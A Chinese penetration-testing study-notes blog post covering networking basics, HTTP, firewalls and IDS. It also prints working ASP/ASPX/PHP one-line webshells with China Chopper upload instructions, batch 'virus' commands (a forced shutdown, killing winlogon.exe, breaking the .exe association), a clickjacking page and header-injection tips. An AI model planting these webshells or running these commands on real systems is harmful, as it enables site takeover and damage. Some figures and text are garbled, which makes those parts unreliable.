[渗透笔记][相关知识] 渗透测试相关知识

渗透测试流程

明确目标、信息收集、漏洞探测、漏洞验证、信息分析、获取所需、信息整理、形成报告

IP五类地址

A 类地址
一个A 类IP地址仅使用第一个8位位组表示网络地址。剩下的3个8位位组表示 主机地址A类地址的第一个位总为0,这一点限制了A类地址的范围小于127。 最左边位表示128,在这里空缺。因此仅有127个可能的A类网络,并且全0保留。A类地址后面的24位(3个点-十进制数)表示可能的 主机地址,A类 网络地址的范围从1.0.0.0到126.0.0.0。注意只有第一个8位位组表示 网络地址,剩余的3个8位位组用于表示第一个8位位组所表示网络中惟一的 主机地址,当用于描述网络时这些位置为0。 注意技术上讲,127.0.0.0 也是一个A类地址,但是它已被保留作闭环(look back )测试之用而不能分配给一个网络。 每一个A类地址能支持16777214个不同的 主机地址,这个数是由2的24次方再减去2得到的。减2是必要的,因为IP把全0保留为表示网络,而全1表示网络内的 广播地址。其中10.0.0.0 和10.255.255.255保留。

B 类地址
设计B类地址的目的是支持中到大型的网络。B类 网络地址范围从128.0.0.0到191.255.255.255。B 类地址蕴含的数学逻辑是相当简单的。一个 B类IP地址使用两个8位位组表示 网络号另外两个8位位组表示主机号。B类地址的第1个8位位组的前两位总置为10,剩下的6位既可以是0也可以是1,这样就限制其范围小于等于191,由128+32+16+8+4+2+1得到。最后的16位( 2个8位位组)标识可能的 主机地址。每一个B类地址能支持64534 个惟一的 主机地址,这个数由2的16次方减2得到。B类网络仅有16382个,其中172.16.0.0和172.31.255.255保留。

C 类地址
C类地址用于支持大量的小型网络。 这类地址可以认为与A类地址正好相反。A类地址使用第一个8位位组表示 网络号,剩下的3个表示 主机号,而C类地址使用三个8位位组表示 网络地址,仅用一个8位位组表示主机号。 C类地址的前3位数为110,前两位和为192(128+64),这形成了C类 地址空间的下界。第三位等于十进制数32,这一位为0限制了 地址空间的 上界。不能使用第三位限制了此8位位组的最大值为255-32等于223。因此C类 网络地址范围从192.0.0.0 至223.255.255.255。最后一个8位位组用于 主机寻址。每一个C类地址理论上可支持最大256个 主机地址(0~255),但是仅有254个可用,因为0和255不是有效的主机地址。可以有2097150个不同的C类 网络地址,其中192.168.0.0和192.168.255.255保留。

D 类地址
D 类地址用于在IP网络中的 组播( multicasting ,又称为 多目广播)。D类地址的前4位恒为1110 ,预置前3位为1意味着D类地址开始于128+64+32等于224。第4位为0意味着D类地址的最大值为128+64+32+8+4+2+1为239,因此D类 地址空间的范围从224.0.0.0到239. 255. 255.255。

E 类地址
E 类地址保留作研究之用。因此Internet上没有可用的E类地址E类地址的前4位恒为1,因此有效的地址范围从240.0.0.0 至255.255.255.255。

总结: IP地址分类由第一个八位组的值来确定。任何一个0到127 间的 网络地址均是一个A类地址。任何一个128到191间的 网络地址是一个B类地址。任何一个192到223 间的 网络地址是一个C类地址。任何一个第一个八位组在224到239 间的网络地址是一个 组播地址即D类地址。E类保留。

CMS

CMS是"Content Management System"的缩写,意为"内容管理系统"。

B/S和C/S结构

B/S和C/S都是随着互联网的发展而出现的一种网络结构模式

B/S就是“Browser/Server”的缩写,即“浏览器/服务器”模式。
这种模式统一了客户端,让核心的业务处理在服务端完成。只需要在自己电脑或手机上安装一个浏览器,就可以通过web Server与数据库进行数据交互。维护和升级方式更简单,客户端是浏览器,基本不需要维护,只需要维护升级服务器端就可以。
C/S就是“Client/Server”的缩写,即“客户端/服务器”模式。
C/S结构是一种软件系统体系结构,也是生活中很常见的。这种结构是将需要处理的业务合理地分配到客户端和服务器端,这样可以大大降低通信成本,但是升级维护相对困难。比如我们手机中安装的微信、qq、王者荣耀等应用程序就是C/S结构。

MD5

MD5消息摘要算法(英语:MD5 Message-Digest Algorithm),一种被广泛使用的密码散列函数,可以产生出一个128位(16字节)的散列值(hash value),用于确保信息传输完整一致。
我们常常在某些软件下载站点的某软件信息中看到其MD5值,它的作用就在于我们可以在下载该软件后,对下载回来的文件用专门的软件(如Windows MD5 Check等)做一次MD5校验,以确保我们获得的文件与该站点提供的文件为同一文件。

中国菜刀与一句话木马

通过往目标网站中加入一句话木马,就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。
asp的一句话是:

<%eval request ("pass")%>

aspx的一句话是:

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

php的一句话是:

<?php @eval($_POST['pass']);?>

直接将这些语句插入到网站上的某个asp/aspx/php文件上,或者直接创建一个新的文件,在里面写入这些语句,然后把文件上传到网站上即可。打开chopper.exe。连接到这个网址下我们的菜刀文件上,右键点击文件管理,就可以获取整个网站的目录了~然后就可以开始做坏事。

DHCP

动态主机设置协议(英语:Dynamic Host Configuration Protocol,DHCP)是一个局域网的网络协议,主要有两个用途:用于内部网或网络服务供应商自动分配IP地址;给用户用于内部网管理员作为对所有计算机作中央管理的手段。通常被应用在大型的局域网络环境中。

VMware三种网络模式

转载链接:https://blog.csdn.net/Alpha_B612/article/details/80979101

本地局域网IP:192.168.1.1

常见DOS命令

ping -t -l 数据包大小 ip:改变数据包大小
ipconfig                          查看ip
ipconfig/release             释放ip
ipconfig /renew              重新获得ip
systeminfo                     查看系统信息
arp -a                                用于查看缓存中的所有项目
shutdown -s -t 180 -c “hacked”       -s关机 -r重启 -c提示
shutdown -a              取消关机

常见端口

转载链接:https://blog.csdn.net/ypt523/article/details/79636647

注册表

注册表是Windows操作系统的核心数据库,存放着各种参数,直接控制着Windows的启动、硬件驱动程序的装载以及一些Windows应用程序的运行。
其中电脑开机登陆的用户和密码就在注册表里。
打开方式:在运行窗口输入regedit。

URL和http简要

url是统一资源定位符,就是我们常说的网址,对可以从互联网上得到的资源的位置和访问方法的一种简洁的表示,是互联网上标准资源的地址。互联网上的每个文件都有一个唯一的URL,它包含的信息指出文件的位置以及浏览器应该怎么处理它。

我们可通过地址判断其服务器的操作系统类型
例如:http://www.xxx.xxx.com/admin/index.php
对于Windows而言不会区分文件名称的大小写,如果输入index.php和index.PHP都不会报错;
但是对于Linux系统而言,就是区分大小写的,输入index.php就不会报错,index.PHP就会报错。

http头
200 响应码
date 日期
content-type 类型
Accept-charset 浏览器可接受的字符集
Content-length 表示请求信息的正文的长度
Cookie 是很重要的信息之一

http请求
GET 通过URL传值的方式进行传值,明文的,不安全
POST
OPTIONS
PUT
MOVE
DELETE
TRACE

HTTP错误配置会导致安全漏洞
服务器存在允许PUT方式和MOVE方式,这时可以通过PUT方式传输一个webshell.txt然后通过MOVE方式结合解析漏洞就可以拿到webshell。(同文件夹下MOVE同一个文件就是修改名字)

HTTP头文件中安全隐患
在PHP中通常会使用$_SERVR[“HTTP_CLIENT_IP”]或者$_SERVER[“HTTP_X_FORWARDED_FOR”]来获取IP。
所以可以通过修改http头中的X-Forwarded-For:、client-ip:来进行攻击。
突破服务器访限制IP

http头注入攻击
注入 X-Forwarded-For:1.1.1.1’
在对ip进行传输的时候用的是insert into update方式来传输获修改,用上述方式就可能通过报错形成注入攻击。

http工作原理
http请求采用请求/响应模型。
其中一个特点是无连接:即浏览器端请求时建立连接,服务端响应后连接就断开,如果想再次获取相同的url内容,还必须再次连接。

在浏览器地址栏输入URL,按下回车之后会经历以下流程:
1、浏览器向 host或DNS 服务器请求解析该 URL 中的域名所对应的 IP 地址;
2、解析出 IP 地址后,根据该 IP 地址和默认端口 80,和服务器建立TCP连接;
3、浏览器发出读取文件的HTTP 请求,该请求报文作为 TCP 三次握手的第三个报文的数据发送给服务器;
4、服务器对浏览器请求作出响应,并把对应的 html 文本发送给浏览器;
5、释放 TCP连接;
6、浏览器解释 html 文本并显示内容;

APT攻击

即高级可持续威胁攻击,也称为定向威胁攻击,指某组织对特定对象展开的持续有效的攻击活动。

简单病毒

当把文件放到启动程序中,就会导致每次开机执行此程序

.bat文件
作用:关机

shutdown -s -t 60
.vbs文件
作用:弹框

do
msgbox "hello"
loop
.bat文件
作用:蓝屏

ntsd -c q -pn winlogon.exe
.bat文件
作用:把.exe文件改成.txt文件

assoc .ext=txtfile

------------------
改回
assoc .exe=exefile

XSS

跨站脚本攻击。通过html注入,篡改网页,插入恶意脚本,当用户在浏览网页时,实现控制用户浏览器行为的一种攻击方式。

存储型:访问携带xss脚本的页面;存储在数据库中;后端web应用程序输出;输出在http相应中。
反射型:访问携带xss脚本的url;存储在url(把xss写在url中);后端web应用程序输出;输出在http相应中。
DOM型:访问携带xss脚本的url;存储在url中(hash);js输出;输出在动态构造的DOM节点。


CSRF漏洞

跨站请求伪造。利用用户已经登录的cookie,以用户名义完成非法操作,需要用户主动访问攻击页面的过程


点击劫持

通过覆盖不可见的框架误导受害者点击而造成的攻击行为

简单示例
<!DOCTYPE html>
<html>
<head>
	<title>点击劫持</title>
	<meta charset="utf-8">
	<style type="text/css">
		form{
			text-align: center;
		}
		.myCss{
			width: 160px;
			position: absolute;
			left: 690px;
			opacity: 0.0;
		}
	</style>
</head>
<body>
	<h2 style="text-align:center">登录系统</h2>
	<form>
		<a class="myCss" href="http://www.baidu.com">百度百度百度百度百度</a>
		<p><input type="text" name="user" /></p>
		
		<p><input type="password" name="pass" /></p>
		<p><input style="width: 160px;height: 30px" type="submit" name="提交" value="submit"/></p>
	</form>
</body>
</html>

命令注入

通过& && ||来实现将构造的命令嵌入后台脚本中,执行自己想要执行的命令


极客方舟课程

课程内容
预备、基础知识、网络协议、数据库、服务器搭建、web开发、信息搜索、系统漏洞、内网渗透、
后渗透、安全工具、ctf结合、靶机虚拟实战、模拟真实环境、总结

web漏洞
sql注入、xss攻击、csrf攻击、ssrf攻击、xxe漏洞、信息泄漏、目录遍历、命令执行、反序列化
文件上传、越权漏洞、逻辑漏洞、弱口令、0Day漏洞、代码审计

局域网LAN(Local Area Network)
通常包含一下几类
192.168.. 个人家庭
172.16.. ~ 172.31.. 小公司
10...* 学校
内网可以理解为局域网

网卡
网卡是一块被设计用来允许计算机在计算机网络上进行通讯的计算机硬件。

MAC地址–Media Access Control,介质访问控制符,全球唯一性
用来定义网络设备的位置。MAC集成在网卡。
网络中每台设备都有一个唯一的网络标识,这个地址叫MAC地址或网卡地址,
由网络设备制造商生产时写在硬件内部。

端口映射
将外网主机的IP地址的一个端口映射到内网中一台机器,提供相应的服务。当用户访问该IP的这个端口时,
服务器自动将请求映射到对应局域网内部的机器上。

网关
网关(Gateway)就是一个网络连接到另一个网络的“关口”。也就是网络关卡。

子网掩码
子网掩码是一个32位地址,用于屏蔽IP地址的一部分以区别网络标识和主机标识,并说明该IP地址是在局域网上,还是在广域网上。
子网掩码不能单独存在,它必须结合IP地址一起使用。子网掩码只有一个作用,就是将某个IP地址划分成网络地址和主机地址两部分。

IPv4、IPv6
可以理解为ip的两个版本,一开始出现的是IPv4,地址长度是32;由于IPv4支持的物理ip即将用光,
出现IPv6,地址长度是128.

cookie和session
就是一个保存状态的数据或者文件
cookie数据存放在客户端
session数据存放在服务端

0Day漏洞就是最新产生的漏洞

DDOS攻击
通过大量肉鸡向服务器发送请求,使网站服务器充斥大量要求回复的信息,消耗网络带宽或系统资源,
导致网络或系统不胜负荷以至于瘫痪而停止提供正常的网络服务。

后渗透
攻击完成后,建立后门,便于持久访问


OWASP Top10漏洞体系
在这里插入图片描述


防火墙

一、防火墙的概念
1、防火墙是用于将信任网络与非信任网络隔离的一种技术,它通过制定相应的安全策略,可监测、限制、更改跨越防火墙的数据流,来保护信任网络,以防止发生不可预测的、具有潜在破坏性的侵入。
2、防火墙一般位于网络数据流的必经节点;从外向内一般位于路由器的后面,交换机的前面;防火墙与网络是串联关系

二、防火墙的工作模式
防火墙基本工作模式:路由模式、桥接(透明)模式。
路由模式中防火墙划分的几个部分一般不在同一个局域网中;而桥接模式中防火墙划分的几个区域一般位于同一个局域网中。

三、防火墙的功能与缺陷
1、防火墙的功能
(1)访问控制
(2)传输安全
(3)路由
(4)地址转换(NAT)
(5)服务代理
(6)攻击检测和防御

2、防火墙的缺陷
(1)不能防范恶意的内部用户。
如果攻击者已经渗透到内网中,防火墙起不到防范作用
(2)不能防范绕过防火墙的连接。
内部网络的用户与外网建立的连接没有经过防火墙,则起不到防范作用
(3)不能防范新的安全威胁
(4)不能防范新的驱动式攻击
比如反向木马
(5)不适合进行病毒检测

四、防火墙的相关技术
1、包过滤
(1)包过滤防火墙工作在网络层,对进出内部网络的IP包按照一定的安全策略(包过滤规则)进行检查,
并按照规则进行处理(转发、丢弃或拒绝等)

(2)包过滤技术工作原理
简单包过滤防火墙不检查数据区;数据包过滤一般要检查网络层的IP头:包括IP源地址、IP目的地址、协议类型(TCP包、UDP包、ICMP包)和传输层头:包括TCP或UDP包的源端口、TCP或UDP包目的端口、ICMP消息类型。

(3)包过滤的工作流程
——1、提取数据包的相关信息,按照从头到尾的顺序,与规则表中的规则进行比较。
——2、如果符合其中的一条规则,则按照相应的规则处理数据包(允许或拒绝),终止匹配。规则次序很关键,要把特殊的规则放在前面端,把想对不特殊的规则放在后端。
——3、默认规则位于规则列表末尾,用户可以自行将默认规则设置为拒绝或允许数据包通过。

2、状态检测
状态检测技术采用基于链接状态的检测机制,将属于同一连接的所有数据包视作一个整体数据流。这些数据流具有一些状态,而且这些状态会根据一定的条件发生变化,从而构成连接状态表。
通过包过滤规则表与状态表,可对链接数据流进行控制。
状态检测仅可用于具有状态的链接中。

3、代理
代理技术是针对每一个特定应用都有一个程序,它用来提供应用层服务的控制。
代理服务器是指代理内部网络用户与外部网络服务器进行信息交换的程序。

4、网络地址转换(NAT)
(1)将一个或多个IP地址转换为另一个IP地址或多个IP地址
(2)NAT的主要作用是隐藏内部网络的资源;实现IP地址复用,解决地址紧缺问题。


Vpn

一、VpN概述
依靠Internet服务提供商ISP(Internet Service Provider)在公共网络中建立的虚拟专用通信网络。

二、VpN原理
VpN是利用隧道技术,把VpN报文封装在隧道中,利用vpVpNn骨干网建立专用数据传输通道,实现报文的透明传输。

隧道技术使用一种协议封装另外一种协议报文,而封装协议本身也可以被其他封装协议所封装或承载。对用户来说,隧道是其公共交换电话网(PSTN)/综合业务数字网(ISDN)链路的逻辑延伸,在使用上与实际物理链路相同。


入侵检测

一、入侵检测的相关概念
1、入侵通常包括对网络的入侵和对终端系统的入侵,是对网络或系统中的硬件、软件、数据及配置的非授权或者超越许可权限的访问、复制、修改、删除,对网络或信息系统的安全造成破坏的行为。

2、入侵检测:对企图入侵、正在进行的入侵或已经发生的入侵进行发现和识别的过程
入侵检测系统:IDS
主机入侵检测系统:HIDS
网络入侵检测系统:NIDS

3、蜜罐:一种专门为吸引和诱骗视图非法闯入他人计算机系统的人而设计的资源,其价值在于被攻击或攻陷。

二、入侵行为的特征
一组能确定网络访问或系统行为是入侵行为的字符串、数据、行为模式或符号组合等。入侵行为的特征是入侵检测系统鉴别入侵行为的基本依据。

三、入侵检测系统的工作过程
1、信息收集:实时网络报文或系统日志
2、信号分析:模式匹配、统计分析、完整行验证
3、相应:告警、记录日志、与防火墙联动等

猜你喜欢

转载自blog.csdn.net/weixin_42172261/article/details/96733554
今日推荐